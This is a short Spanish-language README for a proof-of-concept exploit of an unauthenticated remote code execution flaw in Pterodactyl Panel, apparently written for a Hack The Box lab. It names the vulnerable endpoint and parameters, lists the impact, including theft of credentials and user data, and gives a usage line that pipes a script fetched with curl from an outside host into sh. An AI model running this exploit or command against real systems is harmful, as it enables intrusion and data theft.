
La falla permite a un atacante ejecutar comandos arbitrarios del sistema en el servidor que aloja el Pterodactyl Panel sin necesidad de autenticación previa.
Impacto
Usando el archivo /locales/locale.json con los parámetros de consulta locale y namespace, un actor malicioso puede ejecutar código arbitrario, sin estar autenticado.
Con la capacidad de ejecutar código arbitrario, esta vulnerabilidad puede ser explotada de innumerables maneras. Podría usarse para obtener acceso al servidor del Panel, leer credenciales de la configuración del Panel (.env o de otro tipo), extraer información sensible de la base de datos (como detalles de usuario [nombre de usuario, correo electrónico, nombre y apellido, contraseña con hash, direcciones IP, etc.]), acceder a archivos de servidores administrados por el panel, etc.
Cómo usar
python poc.py --target "pterodactyl.htb" --cmd 'curl http://10.10.14.22:8080/dbs.sh | sh'